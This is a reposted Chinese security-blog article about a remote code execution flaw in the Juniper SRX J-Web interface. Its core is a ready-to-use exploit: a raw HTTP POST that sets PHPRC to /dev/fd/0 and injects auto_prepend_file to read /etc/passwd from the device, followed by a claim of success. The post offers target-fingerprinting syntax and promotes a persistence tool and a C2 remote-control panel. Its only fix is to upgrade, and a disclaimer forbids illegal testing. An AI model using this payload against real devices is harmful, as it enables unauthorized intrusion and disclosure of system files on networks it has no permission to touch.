某网络设备RCE漏洞(附EXP)

渗透技巧 7个月前 admin
155 0 0
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送,建议大家把阿无安全设为星标”,否则可能看不到了


0x01 前言

   
瞻博网络 SRX 系列服务网关已预装瞻博网络 Junos 操作系统 (Junos OS)。J-Web 界面允许您通过默认情况下使用安全套接字层 HTTP (HTTPS) 启用的 Web 浏览器来监控、配置、故障排除和管理设备。该设备存在命令执行漏洞。


0x02 漏洞影响


    影响版本

Juniper SRX系列

0x03 漏洞利用

登录界面

某网络设备RCE漏洞(附EXP)

EXP:

POST /?PHPRC=/dev/fd/0 HTTP/1.1Host: ip:portSec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ip:port/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 31
auto_prepend_file="/etc/passwd"

命令执行成功!

某网络设备RCE漏洞(附EXP)

0x04 修复方案

请升级最新版本。 


0x05 下载地址

点击下方名片进入公众号

回复【J-Web】获取指纹语法

某网络设备RCE漏洞(附EXP)

往期推荐 · 值得阅看

CVE-2023-2317 RCE漏洞

苕皮期间~致远OA 0day漏洞

苕皮期间~用友Nday漏洞(附EXP)

CVE-2023-3450 RCE漏洞(附EXP)

CVE-2023-26469 RCE漏洞(附EXP)

CVE-2023-4120 某设备注入漏洞(附EXP)

CVE-2023-4450 | JeecgBoot RCE漏洞(附EXP)

NB!分享一款神器 Linux权限维持Tools(附下载)

分享一款WEB界面的高仿CobaltStrike C2远控Tools(附下载)





原文始发于微信公众号(阿无安全):某网络设备RCE漏洞(附EXP)

版权声明:admin 发表于 2023年9月22日 上午10:37。
转载请注明:某网络设备RCE漏洞(附EXP) | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...